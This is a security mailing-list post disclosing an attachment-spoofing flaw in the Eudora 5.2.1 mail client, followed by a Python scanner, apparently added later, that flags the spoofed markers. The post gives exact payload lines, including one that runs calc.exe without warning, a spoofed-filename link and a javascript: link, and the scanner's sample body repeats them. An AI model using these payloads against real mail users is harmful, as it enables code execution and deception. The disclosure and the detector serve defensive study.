Building on my Eudora attachment spoof

  http://www.securityfocus.com/archive/1/322286

I have now found better games to play:

  From: me
  To: you

Ensure victim has both attachments 'calc' and 'calc.exe' (sent in this,
or previous, email). Then the following shows 'windows' icon and runs
calc.exe without warning when clicked:

  Attachment Converted<CR>: attach\calc

Other mis-features I found (but I do not see how to make them into a
credible exploit):

If we can guess the full path to the attach directory then can change
the name shown to anything we like, but get broken icon:

  Attachment Converted<CR>: <A href=H:/windows/.eudora/attach/calc>file.txt</a>

Javascript done with InternetExplorer even if we set own viewer:

  Attachment Converted<CR>: <A href=javascript:alert('hello')>hello.txt</a>

Replace the four-character <CR> marker with the single byte CR=0x0d in
all of above.

Tested with Eudora 5.2.1 on Windows 2000.

Cheers,

Paul Szabo - psz@maths.usyd.edu.au
http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics
University of Sydney 2006 Australia
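A gateway-side check for the marker described above, as an added example that is not part of the original post: it flags body text where "Attachment Converted" is followed by a lone CR byte (0x0d) and a colon, and labels the target by the three variants the post lists. The function names, labels and sample message are constructed for illustration.

```python
import re

# "Attachment Converted", then a CR that is NOT part of a CRLF pair, then ":".
# A CR directly followed by ":" is by definition a bare CR.
SPOOF = re.compile(rb"Attachment Converted\r:[ \t]*([^\r\n]*)")
# Anchor tag used as the target in two of the post's variants.
HREF = re.compile(rb"<a\s+href=[\"']?([^\"'\s>]+)", re.IGNORECASE)
BARE_CR = re.compile(rb"\r(?!\n)")


def classify(target: bytes) -> str:
    """Label the target the way the post groups its three variants."""
    m = HREF.match(target.strip())
    if m is None:
        return "bare-path"        # e.g. attach\calc
    if m.group(1).lower().startswith(b"javascript:"):
        return "script-href"      # href=javascript:...
    return "renamed-link"         # href=<path> with a different display name


def scan_body(body: bytes):
    """Return (line_number, label, target) for every spoofed marker."""
    findings = []
    for m in SPOOF.finditer(body):
        line_no = body.count(b"\n", 0, m.start()) + 1
        target = m.group(1)
        findings.append((line_no, classify(target), target.decode("latin-1")))
    return findings


def bare_cr_count(body: bytes) -> int:
    """Bare CRs are not valid in mail bodies (RFC 5322 requires CRLF pairs)."""
    return len(BARE_CR.findall(body))


# Constructed sample body: CRLF line endings, three markers with a bare CR,
# and one line without the CR byte that must not be flagged.
SAMPLE = (
    b"Hello,\r\n"
    b"Attachment Converted\r: attach\\calc\r\n"
    b"Attachment Converted\r: <A href=H:/windows/.eudora/attach/calc>file.txt</a>\r\n"
    b"Attachment Converted\r: <A href=javascript:alert('hello')>hello.txt</a>\r\n"
    b"Attachment Converted: text without the CR byte\r\n"
)

if __name__ == "__main__":
    for line_no, label, target in scan_body(SAMPLE):
        print(f"line {line_no}: {label}: {target!r}")
    print("bare CR bytes:", bare_cr_count(SAMPLE))
```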